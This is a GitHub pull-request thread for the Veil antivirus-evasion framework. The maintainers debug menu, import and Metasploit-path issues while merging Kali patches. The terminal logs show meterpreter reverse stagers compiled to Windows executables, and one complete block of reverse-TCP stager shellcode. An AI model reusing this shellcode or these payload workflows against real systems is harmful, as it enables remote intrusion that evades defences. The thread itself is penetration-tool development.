Skip to content
This repository has been archived by the owner on Jan 10, 2024. It is now read-only.

Applying Kali's Patches & Other stuff #189

Merged
merged 38 commits into from
Apr 23, 2018
Merged

Conversation

g0tmi1k
Copy link
Contributor

@g0tmi1k g0tmi1k commented Apr 10, 2018

No description provided.

@g0tmi1k g0tmi1k changed the title Misc Applying Kali's Patches & Other stuff Apr 10, 2018
@ChrisTruncer
Copy link
Member

Hey, I went through and tested this. Ran into one issue, and one oddity I wanted to run by you. With this current pull request, I can't generate golang based payloads. When trying to compile, it provides the following error:

missing go

Also, this isn't a bug because it still works, but when giving the "generate" command, Veil normally used to go back to it's normal menu (it has the Veil header at the top) and asks how to get the shellcode. However, now it seems to just go to the next line down (in the pic below).

no titlebar

I'm not sure if this is due to the patch, or somehow the code doing something odd. I'll try to check into it too.

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 11, 2018

Sorry, the commits before were WIP.
It is now finished/ready to be merged.


The reason why it continues, is because it was running os.system, which failed without fully checking the output (REF: https://github.com/Veil-Framework/Veil/blob/master/tools/evasion/evasion_common/outfile.py#L206
w).
Fixed the os.system, but didn't fix the checking for output file.


g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py -t Evasion -p go/meterpreter/rev_tcp.py --ip 127.0.0.1 --port 4444
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

runtime/internal/sys
runtime/internal/atomic
runtime
errors
internal/race
sync/atomic
math
sync
io
unicode/utf8
internal/syscall/windows/sysdll
unicode/utf16
syscall
strconv
reflect
encoding/binary
command-line-arguments
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: go
 [*] Payload Module: go/meterpreter/rev_tcp
 [*] Executable written to: /var/lib/veil/output/compiled/payload.exe
 [*] Source code written to: /var/lib/veil/output/source/payload.go
 [*] Metasploit RC file written to: /var/lib/veil/output/handlers/payload.rc
g0tmi1k@kali-dev:~/Desktop/Veil$ 
g0tmi1k@kali-dev:~/Desktop/Veil$ file /var/lib/veil/output/compiled/payload.exe
/var/lib/veil/output/compiled/payload.exe: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
g0tmi1k@kali-dev:~/Desktop/Veil$
g0tmi1k@kali-dev:~/Desktop/Veil$ ls -lah /var/lib/veil/output/compiled/payload.exe
-rwxr-xr-x 1 g0tmi1k g0tmi1k 770K Apr 11 17:40 /var/lib/veil/output/compiled/payload.exe
g0tmi1k@kali-dev:~/Desktop/Veil$

@ChrisTruncer
Copy link
Member

There looks to be a big when using msfvenom for generating shellcode rather than veil-ordnance. If you use msfvenom, you get asked for the payload type, IP, and port. It then asks if you have any extra options. If there are none, and you hit enter, msfvenom should generate the shellcode.

However, if you hit enter, msfvenom isn't invoked, and you're dropped right into the Veil-Ordnance menu.

msfvenom2ordnance

This was referenced Apr 12, 2018
@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 12, 2018

Thanks @leesoh !

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 12, 2018

@ChrisTruncer I can't find your bug. I don't know where you are looking/how you are trigging it.

Evasion

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 1
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Evasion Menu

	41 payloads loaded

Available Commands:

	back			Go to Veil's main menu
	checkvt			Check VirusTotal against generated hashes
	clean			Remove generated artifacts
	exit			Completely exit Veil
	info			Information on a specific payload
	list			List available payloads
	use			Use a specific payload

Veil-Evasion command: use 5
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 Payload information:

	Name:		Pure C Reverse HTTP Stager
	Language:	c
	Rating:		Excellent
	Description:    pure windows/meterpreter/reverse_http stager, no
	                shellcode

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	        	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] set LHOST 127.0.0.1
[c/meterpreter/rev_http>>] options

Payload: c/meterpreter/rev_http selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
COMPILE_TO_EXE  	Y       	Compile to an executable
LHOST           	127.0.0.1	IP of the Metasploit handler
LPORT           	8080    	Port of the Metasploit handler

 Available Commands:

	back        	Go back
	exit        	Completely exit Veil
	generate    	Generate the payload
	options     	Show the shellcode's options
	set         	Set shellcode option
[c/meterpreter/rev_http>>] run
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Please enter the base name for output files (default is payload): test100
===============================================================================
                                   Veil-Evasion
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

 [*] Language: c
 [*] Payload Module: c/meterpreter/rev_http
 [*] Executable written to: /var/lib/veil/output/compiled/test100.exe
 [*] Source code written to: /var/lib/veil/output/source/test100.c
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/test100.rc

Hit enter to continue... 
[c/meterpreter/rev_http>>] exit
g0tmi1k@kali-dev:~/Desktop/Veil$ 

Ordnance

g0tmi1k@kali-dev:~/Desktop/Veil$ ./Veil.py 
===============================================================================
                             Veil | [Version]: 3.1.5
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Main Menu

	2 tools loaded

Available Tools:

	1)	Evasion
	2)	Ordnance

Available Commands:

	exit			Completely exit Veil
	info			Information on a specific tool
	list			List available tools
	options			Show Veil configuration
	update			Update Veil
	use			Use a specific tool


Main menu choice: use 2
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Veil-Ordnance Menu

	6 payloads loaded
	1 encoders loaded

Available Commands:

	back			Go to Veil's main menu
	exit			Completely exit Veil
	info			Information on a specific payload or encoder
	list			List available [payloads] or [encoders]
	use			Use a specific payload

Veil-Ordnance command: use rev_tcp
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	        	LHOST value
LPORT           	        	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: set LPORT 4444
[rev_tcp>>]: set LHOST 127.0.0.1
[rev_tcp>>]: options
===============================================================================
                                   Veil-Ordnance
===============================================================================
      [Web]: https://www.veil-framework.com/ | [Twitter]: @VeilFramework
===============================================================================

Payload: rev_tcp selected

Required Options:

Name            	Value   	Description
----            	-----   	-----------
BadChars        	\x00    	Optional: Bad characters to avoid
Encoder         	None    	Optional: Encoder to use when avoiding bad characters
LHOST           	127.0.0.1	LHOST value
LPORT           	4444    	LPORT value

Available Commands: 

	back    		Go back 
	exit    		Completely exit Veil
	generate		Generate the payload
	list    		List available encoders
	options 		Show the payload's options
	set     		Set payload option

[rev_tcp>>]: run
Payload Name: Reverse TCP Stager (Stage 1)
IP Address: 127.0.0.1
Port: 4444
Shellcode Size: 287

\xfc\xe8\x86\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x8b\x4c\x10\x78\xe3\x4a\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x89\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x09\x68\x7f\x00\x00\x01\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3

Hit enter to continue... 
[rev_tcp>>]: exit
g0tmi1k@kali-dev:~/Desktop/Veil$

@ChrisTruncer
Copy link
Member

No, it did not have the PR merged. I was using it as a separate baseline. I'm a little concerned that that change though is impacting Veil (as shown in the end of the pastebin). When I was trying to use Ordnance to generate shellcode, it couldn't take that generated shellcode back into Evasion.

@ChrisTruncer
Copy link
Member

I'm fine with staying on the same menu and not going immediately back into the top level menu. But I'm not sure if that mod is preventing Evasion from grabbing the shellcode from Ordnance

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 13, 2018

Could you give example commands/output, cos I'm really not seeing it.

@ChrisTruncer
Copy link
Member

This is still staying in the Ordnance screen after generating shellcode (after it says "hit enter to return to veil-evasion"). Currently, you have to type back even though it says to hit enter. At this point, I'd prefer for it to jump right back into Evasion if using Ordnance as our shellcode generator.

Sample output here - https://pastebin.com/xq3mY7um

Also, line 158 and 159 show it not displaying the header and just has the commands right after the previous ones.

sys.exit()


sys.path.insert(0, settings.VEIL_EVASION_PATH + 'tools/ordnance')
sys.path.insert(0, settings.VEIL_PATH + 'tools/ordnance')
import tool as ordnance_import
Copy link

@programatologist programatologist Apr 14, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Shouldn't this be
import tools as ordnance_import
rather than
import tool as ordnance_import since the module(folder) name is tools
Same issue present in
tools/evasion/evasion_common/shellcode_help.py

Copy link
Contributor Author

@g0tmi1k g0tmi1k Apr 16, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@programatologist ~ But the file it's including is called ./tools/ordnance/tool.py not ./tools/ordnance/tools.py ?

sys.exit()


sys.path.insert(0, settings.VEIL_EVASION_PATH + 'tools/ordnance')
sys.path.insert(0, settings.VEIL_PATH + 'tools/ordnance')
import tool as ordnance_import

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This should be
import tools as ordnance_import
rather than
import tool as ordnance_import since the module(folder) name is tools

Copy link
Contributor Author

@g0tmi1k g0tmi1k Apr 16, 2018

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

@programatologist ~ But the file it's including is called ./tools/ordnance/tool.py not ./tools/ordnance/tools.py ?

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 17, 2018

Working!

The issue was we were using different payloads...

root@kali-dev:~/Desktop/veil# ./Veil.py 
...SNIP...
Veil>: use 1
...SNIP...
Veil/Evasion>: use 33
...SNIP...
[python/shellcode_inject/flat>>]: run
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
Veil/Ordnance>: use 2
...SNIP...
[rev_http>>]: set LHOST 127.0.0.1
[rev_http>>]: set LPORT 443
[rev_http>>]: run
...SNIP...
Please enter the base name for output files (default is payload): out
...SNIP...
 [>] Please enter the number of your choice: 1
...SNIP...
 [*] Language: python
 [*] Payload Module: python/shellcode_inject/flat
 [*] Executable written to: /var/lib/veil/output/compiled/out.exe
 [*] Source code written to: /var/lib/veil/output/source/out.py
 [*] Metasploit Resource file written to: /var/lib/veil/output/handlers/out.rc

Hit enter to continue...
...SNIP...
Veil/Evasion>: 

@g0tmi1k g0tmi1k mentioned this pull request Apr 18, 2018
@ChrisTruncer
Copy link
Member

This is currently failing to start on Debian. I tried on my existing VM, but I did not build a brand new VM. However, I get a "No module named Tool" error.

veil

@ChrisTruncer
Copy link
Member

Ok, I figured out the reason @g0tmi1k if you are able to modify your pull request. This should be a quick fix.

Line 741 should say "python3" instead of python when invoking the update-config.py script. After that, it seems to work and run on my system.

Only final issue I am having is the tab completion and all of msfvenom shellcode generation is broken on Debian. Trying to look into it now.

@ChrisTruncer
Copy link
Member

It looks like the "Metasploit_Path" variable is being set within the update-config.py file except for one-offs based on linux flavor detection and the path is being changed. Could you change line 178's default value of Metasploit_Path to be "/opt/metasploit-framework/embedded/framework/"?

Veil needs it to be that path to properly parse available payloads under it. Once both changes (from above post too) are made, I think this is good to go. I'll test one more time, but seems to be working with these changes on my end.

@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 23, 2018

Rather than doing something like:

  type python3 2>&1 >/dev/null
  [ $? -eq "0" ] \
    && sudo -u "${trueuser}" sudo python3 update-config.py \
    || sudo -u "${trueuser}" sudo python update-config.py

Something "better" would be to use the shebang to define the python version (as it is already set there!) ~ https://github.com/g0tmi1k/Veil/blob/4791e2a6b6c2b9e7a2759d9305965af0d4efa66e/config/update-config.py#L1.

I dunno what the package path is for Metasploit outside of Kali :P.

Commited!

@ChrisTruncer
Copy link
Member

just pushed minor update to readme.

All looks great! THanks for the large amount of time taken to do this, and it's now getting merged!

@ChrisTruncer ChrisTruncer merged commit 1fde7c7 into Veil-Framework:master Apr 23, 2018
@ChrisTruncer
Copy link
Member

merged!

@g0tmi1k g0tmi1k deleted the misc branch April 23, 2018 15:11
@g0tmi1k
Copy link
Contributor Author

g0tmi1k commented Apr 23, 2018

🎉

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

5 participants